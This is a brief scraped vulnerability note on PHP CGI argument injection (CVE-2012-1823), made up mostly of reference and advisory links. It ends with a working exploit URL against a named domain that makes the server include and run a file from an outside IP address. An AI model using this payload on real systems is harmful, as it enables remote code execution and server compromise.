天天看點

PHP CGI Argument Injection

<* 參考

<a href="http://sebug.net/lto?url=http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/">http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/</a> <a href="http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/">http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/</a> <a href="http://sebug.net/lto?url=http://ompldr.org/vZGxxaQ">http://ompldr.org/vZGxxaQ</a> <a href="http://sebug.net/lto?url=http://zone.wooyun.org/content/151">http://zone.wooyun.org/content/151</a> <a href="http://sebug.net/lto?url=http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html">http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html</a> <a href="http://sebug.net/lto?url=http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html">http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html</a>

*&gt;

exploit:

<a href="http://www.exploit-db.com/exploits/18836/">http://www.exploit-db.com/exploits/18836/</a>

漏洞利用:

<a href="http://gdfreenet.cn/new.php?-dallow_url_include%3Don+-dauto_prepend_file%3Dhttp://218.56.57.151/testtest.txt">http://gdfreenet.cn/new.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://218.56.57.151/testtest.txt</a>